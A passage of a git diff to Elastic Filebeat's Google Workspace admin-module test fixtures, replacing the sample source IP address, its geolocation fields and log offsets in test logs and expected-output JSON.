@@ -4181,7 +3869,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "event.provider": "admin", "event.type": [ "info" 
@@ -4194,26 +3882,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 33523, + "log.offset": 33445, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -4234,7 +3918,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "event.provider": "admin", "event.type": [ "info" 
@@ -4247,26 +3931,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 33965, + "log.offset": 33886, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -4287,7 +3967,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "event.provider": "admin", "event.type": [ "info" 
@@ -4300,26 +3980,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 34409,
+ "log.offset": 34329,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -4340,7 +4016,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_SECONDARY_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_SECONDARY_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -4354,26 +4030,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 34850,
+ "log.offset": 34769,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -4395,7 +4067,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_SSO_SETTINGS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_SSO_SETTINGS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -4407,26 +4079,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 35311,
+ "log.offset": 35229,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -4447,7 +4115,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_PIN\"}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_PIN\"}}",
 "event.provider": "admin",
 "event.type": [
 "creation"
@@ -4458,26 +4126,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 35692,
+ "log.offset": 35609,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -4498,7 +4162,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -4510,26 +4174,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 36006,
+ "log.offset": 35922,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log
index dc0842dc0d4e..feeccbb4b37e 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log
@@ -1,9 +1,9 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"DROP_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"EMAIL_LOG_SEARCH","parameters":[{"name":"EMAIL_LOG_SEARCH_END_DATE","value":"2020/07/28 04:59:59 UTC"},{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"EMAIL_LOG_SEARCH_RECIPIENT","value":"recipient"},{"name":"EMAIL_LOG_SEARCH_SENDER","value":"sender"},{"name":"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP","value":"1.1.1.1"},{"name":"EMAIL_LOG_SEARCH_SMTP_SENDER_IP","value":"1.1.1.1"},{"name":"EMAIL_LOG_SEARCH_START_DATE","value":"2002-10-02T10:00:00Z"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"EMAIL_UNDELETE","parameters":[{"name":"END_DATE","value":"2002-10-02T12:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"START_DATE","value":"2002-10-02T10:00:00Z"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"CHANGE_EMAIL_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"CHANGE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"CREATE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"DELETE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"REJECT_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"RELEASE_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"DROP_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"EMAIL_LOG_SEARCH","parameters":[{"name":"EMAIL_LOG_SEARCH_END_DATE","value":"2020/07/28 04:59:59 UTC"},{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"EMAIL_LOG_SEARCH_RECIPIENT","value":"recipient"},{"name":"EMAIL_LOG_SEARCH_SENDER","value":"sender"},{"name":"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP","value":"89.160.20.156"},{"name":"EMAIL_LOG_SEARCH_SMTP_SENDER_IP","value":"89.160.20.156"},{"name":"EMAIL_LOG_SEARCH_START_DATE","value":"2002-10-02T10:00:00Z"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"EMAIL_UNDELETE","parameters":[{"name":"END_DATE","value":"2002-10-02T12:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"START_DATE","value":"2002-10-02T10:00:00Z"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"CHANGE_EMAIL_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"CHANGE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"CREATE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"DELETE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"REJECT_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"RELEASE_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log-expected.json
index 02c317b9f0e2..675e48502e8f 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log-expected.json
@@ -8,7 +8,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DROP_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DROP_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -24,23 +24,19 @@
 "log.offset": 0,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
